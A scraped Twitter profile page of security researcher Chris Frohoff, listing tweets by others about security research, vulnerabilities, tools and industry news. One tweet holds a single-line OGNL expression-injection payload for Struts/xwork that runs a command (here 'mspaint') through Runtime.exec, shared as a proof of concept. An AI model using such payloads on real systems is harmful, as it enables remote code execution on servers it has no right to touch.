Chris Frohoff (@frohoff) 's Twitter Profile
Chris Frohoff

@frohoff

building things, breaking things, building things that break things. ysoserial night janitor. journeyman ctf plumber. he/him

infosec.exchange/@frohoff

ID: 5810442

linkhttps://frohoff.org calendar_today06-05-2007 15:17:49

5,5K Tweet

1,1K Followers

1,1K Following

Nuria Lago (@enelago) 's Twitter Profile Photo

GitHub - MaximeBeasse/KeyDecoder: KeyDecoder app lets you use your smartphone or tablet to decode your mechanical keys in seconds. github.com/MaximeBeasse/K…

Joshua Browder (@jbrowder1) 's Twitter Profile Photo

Today, DoNotPay is launching a chatGPT extension that reads the Terms and Conditions, leases and flags anything that is non-standard to all our customers

Alvaro Muñoz 🇺🇦 (@pwntester) 's Twitter Profile Photo

Had some fun with OGNL sandboxes last year. Read how I bypassed Atlassian Confluence and Struts ones in my latest blog post github.blog/2023-01-27-byp…

Luca Carettoni (@lucacarettoni) 's Twitter Profile Photo

If you're affected by the recent NCC workforce cut and you still 💕 appsec consulting, we're still hiring Doyensec doyensec.com/careers.html (US based) #onemore #appsec

SummerCon (@summerc0n) 's Twitter Profile Photo

It is with profound sadness that we mourn the loss of our friend and mentor, [email protected]. Kelly had an indomitable spirit, and our world is a bit darker without her.

It is with profound sadness that we mourn the loss of our friend and mentor, <a href="/aloria/">aloria@infosec.exchange</a>. Kelly had an indomitable spirit, and our world is a bit darker without her.
🧗‍♂️ Matt Holt (@mholt6) 's Twitter Profile Photo

‼️A Chinese certificate authority ("HiCA", www1.hi.cn/en/) is injecting arbitrary commands into the ACME challenge process, which acme.sh then executes on the client machine. Here's my current analysis: github.com/acmesh-officia…

🧗‍♂️ Matt Holt (@mholt6) 's Twitter Profile Photo

So I just woke up and apparently I inadvertently discovered a zero-day RCE in acme.sh, and caused a Chinese CA to shut down overnight. Props to the neilpangxa of acme.sh for the quick fix! github.com/acmesh-officia…

Architecture Notes (@arcnotes) 's Twitter Profile Photo

How Relational Databases Work. This post talks about how indexes and transactions work on the inside of relational databases. architecturenotes.co/things-you-sho…

How Relational Databases Work. This post talks about how indexes and transactions work on the inside of relational databases. architecturenotes.co/things-you-sho…
Adrian Cantrill (@adriancantrill) 's Twitter Profile Photo

If you want to truly understand #AWS, you need to learn how it fails. Then you can design things to work around failure. Everything fails, all the time :) Something I cover extensively in my learn.cantrill.io courses .. is failure & resilience :) Please Retweet!

If you want to truly understand #AWS, you need to learn how it fails. Then you can design things to work around failure.  Everything fails, all the time :) Something I cover extensively in my learn.cantrill.io courses .. is failure &amp; resilience :)

Please Retweet!
Matthew Green is on BlueSky (@matthew_d_green) 's Twitter Profile Photo

I remember when Apple proposed their CSAM scanning system in 2021, there were a lot of people complaining about the “slippery slope fallacy” and how we couldn’t just assume that content scanning would be expanded to other purposes. 23 months later: therecord.media/senate-dea-bil…

Justin Alvey (@justlv) 's Twitter Profile Photo

I “jailbroke” a Google Nest Mini so that you can run your own LLM’s, agents and voice models. Here’s a demo using it to manage all my messages (with help from Beeper) 🔊 on, and wait for surprise guest! I thought hard about how to best tackle this and why, see 🧵

ϻг_ϻε (@steventseeley) 's Twitter Profile Photo

{"Xavier":"com.opensymphony.xwork2.validator.validators.RequiredStringValidator","trimExpression":"%{(Java.lang.Runtime@getRuntime().exec('mspaint'))}"}

GiamMa-based researchers SDR R&D IoT (@giammaiot2) 's Twitter Profile Photo

UHFKILL via Lab401 lab401.com/products/uhfki… The UHF RFID deactivation tool.Wirelessly and permanently disable UHF tags.A must have for OpSec/Operational Teams to deactivate tags embedded in clothing, shoes and products that can be used for tracking, identification and detection.

UHFKILL via Lab401

lab401.com/products/uhfki…

The UHF RFID deactivation tool.Wirelessly and permanently disable UHF tags.A must have for OpSec/Operational Teams to deactivate tags embedded in clothing, shoes and products that can be used for tracking, identification and detection.
Christophe Tafani-Dereeper (@christophetd) 's Twitter Profile Photo

Datadog's security team has just released KubeHound, an open-source attack mapping tool for Kubernetes clusters securitylabs.datadoghq.com/articles/kubeh… kubehound.io Comes with 25 attack types, each one comes with step by step instructions of how to exploit it

Datadog's security team has just released KubeHound, an open-source attack mapping tool for Kubernetes clusters

securitylabs.datadoghq.com/articles/kubeh…

kubehound.io

Comes with 25 attack types, each one comes with step by step instructions of how to exploit it